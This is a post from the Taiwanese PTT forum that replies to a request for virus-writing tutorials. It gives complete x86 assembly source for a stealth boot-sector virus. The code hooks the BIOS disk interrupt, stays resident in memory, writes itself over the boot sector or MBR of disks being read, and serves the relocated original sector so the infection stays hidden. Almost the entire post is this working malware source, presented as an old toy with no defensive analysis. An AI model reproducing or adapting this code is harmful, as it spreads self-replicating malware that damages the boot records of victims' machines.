※ 引述《fluteoner (1207)》之铭言： : 听说病毒是用组语写的 : 有人知道哪里有教怎麽写病毒的教材吗?? : 我没有要做坏事，只是研究领域是资安， : 想了解病毒攻击电脑的实际例子 : 谢谢 高职写的开机型 XD 作古的玩具 囧rz ORG 0 JMP $ + 0x3B + 3 NOP TIMES 0x3B DB 0 ; CLI ; initial stack pointer, data segment XOR DI, DI MOV SI, 0x7C00 ; MOV SS,DI ; MOV SP,SI MOV DS,DI ; STI DEC WORD [DS:0x413] ; to allocate 1k memory INT 0x12 ; get size of top of memnory SHL AX, 6 ; memory size convert segment 640K = 640*1024 => 2^10/2^4 = 2^(10-4) MOV ES, AX CLD MOV CX, 0x100 REP MOVSW ; move virus code to top of memory SHL EAX, 0x10 ; seg:off to linear address MOV AX, New_INT13h XCHG EAX, [DS:0x4C] ; hook int 13h MOV DI, Prev_INT13h ; backup org int 13h STOSD INT 19h ; reboot, int 13h redirect our int 13h New_INT13h: OR DH, DH ; head 0 ? JNE SHORT Nope CMP CX, 1 ; sector 1 ? JNE SHORT Nope CMP AH, 3 ; function : write sector JE SHORT Avert CMP AH, 2 ; function : read sector JNE SHORT Nope CALL INT13h ; read org sector JNC SHORT Handler ; if no error, the operation is ok Avert: IRET Nope: DB 0xEA ; opcode of jmp Prev_INT13h DD 0 ; org int 13h Handler: PUSHF ; backup all register for modifyed. PUSHA PUSH DS push ES CMP BYTE [ES:BX+$],'&' ; infector ? JE SHORT Stealth MOV AX, 0x301 ; write org boot/mbr to other sector CALL Crafty ; CALL INT13h PUSH ES PUSH CS POP ES POP DS MOV SI, 2 ; move bpb MOV DI, SI ADD SI, BX MOV CX, 0x3C REP MOVSB MOV SI, 0x1BE ; move pt MOV DI, SI ADD SI, BX MOV CX, 64 REP MOVSB MOV AX, 0x301 ; write virus to boot/mbr XOR BX, BX XOR DH, DH MOV CX, 1 CALL INT13h JMP SHORT RETurn Stealth:MOV AX, 0x201 CALL Crafty ;CALL INT13h RETurn: POP ES POP DS POPA POPF RETF 2 Crafty: MOV CX, 14 OR DL, DL JS SHORT INT13h MOV DH, 1 INT13h: PUSHF CALL DWORD [CS:Prev_INT13h] RET TIMES 512-2-($-$$) DB 0 DB 55h, 0AAH -- --

※ 发信站: 批踢踢实业坊(ptt.cc) ◆ From: 210.68.29.67 ※ 编辑: zha0 来自: 210.68.29.67 (10/31 10:55)